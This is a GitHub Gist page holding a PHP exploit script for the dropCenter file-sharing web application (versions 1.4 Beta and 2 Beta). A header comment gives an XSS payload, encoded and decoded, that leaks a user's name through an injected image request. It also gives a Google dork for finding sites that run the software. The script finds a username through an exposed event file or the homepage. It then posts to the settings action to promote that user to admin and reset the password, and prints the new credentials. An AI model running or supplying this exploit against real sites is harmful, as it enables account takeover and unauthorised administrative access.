Last active
December 21, 2015 11:49
-
-
Save leblanc-simon/6301772 to your computer and use it in GitHub Desktop.
XSS + privilege escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # Exploit Title: dropCenter all version : privilege escalation | |
| # If this is the last version (after 2013-08-20), use permanent XSS to hack the website : | |
| # | |
| # - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
| # | |
| # - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
| # | |
| # Date: 2013-08-02 | |
| # Author: leviathan | |
| # Vendor or Software Link: http://projet.idleman.fr/dropcenter/ | |
| # Version: 1.4 Beta and 2 Beta | |
| # Category:: webapps | |
| # Google dork: DropCenter V1.4 (Beta) par la DropTeam | DropCenter V2 (Beta) par la DropTeam | |
| # Tested on: GNU/Linux with 1.4 Beta and 2 Beta | |
| # Demo site: | |
| // The vulnerable website | |
| $base_url = 'http://localhost'; | |
| $url_folder = '/dropCenter'; | |
| $new_pass = 'my-new-password'; | |
| // Get a username to change password : first to have an administrator | |
| function getUser($base_url, $url_folder, $curl) | |
| { | |
| $user = null; | |
| // Previous version : the file uploads/.dc/.event.dc is allowed | |
| curl_setopt($curl, CURLOPT_URL, $base_url.$url_folder.'/uploads/.dc/.event.dc'); | |
| $response = curl_exec($curl); | |
| $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); | |
| // If the file is deny, check in the homepage | |
| if ($status !== 200 || empty($response) === true) { | |
| curl_setopt($curl, CURLOPT_URL, $base_url.$url_folder.'/index.php'); | |
| $response = curl_exec($curl); | |
| if (empty($response) === false) { | |
| if (preg_match('/editUser\(\'([a-zA-Z0-9]+)\'\)/', str_replace(array("\n", "\r"), '', $response), $matches)) { | |
| $user = $matches[1]; | |
| } elseif (isset($_GET['user'])) { | |
| $user = $_GET['user']; | |
| } else { | |
| die('no user'); | |
| } | |
| } | |
| } else { | |
| $actions = explode("\n", $response); | |
| foreach ($actions as $action) { | |
| $json = json_decode($action); | |
| if ($json instanceof stdClass) { | |
| if (isset($json->user) === true) { | |
| $user = $json->user; | |
| break; | |
| } | |
| } | |
| } | |
| } | |
| return $user; | |
| } | |
| $curl = curl_init(); | |
| curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
| $user = getUser($base_url, $url_folder, $curl); | |
| if (empty($user) === true) { | |
| die('no user getting'); | |
| } | |
| curl_setopt($curl, CURLOPT_URL, $base_url.$url_folder.'/php/action.php?action=saveSettings&user='.$user); | |
| curl_setopt($curl, CURLOPT_POST, true); | |
| $post = array( | |
| 'mail' => '[email protected]', | |
| 'avatar' => 'no-avatar', | |
| 'notifMail' => null, | |
| 'rank' => 'admin', | |
| 'lang' => 'en - English', | |
| 'password' => $new_pass, | |
| ); | |
| curl_setopt($curl, CURLOPT_POSTFIELDS, $post); | |
| $response = curl_exec($curl); | |
| if (empty($response) === true) { | |
| die('error while edit user'); | |
| } | |
| if ($response == '{"succes":true}') { | |
| echo "User : ".$user." / Pass : ".$new_pass."\n"; | |
| } else { | |
| echo $response; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment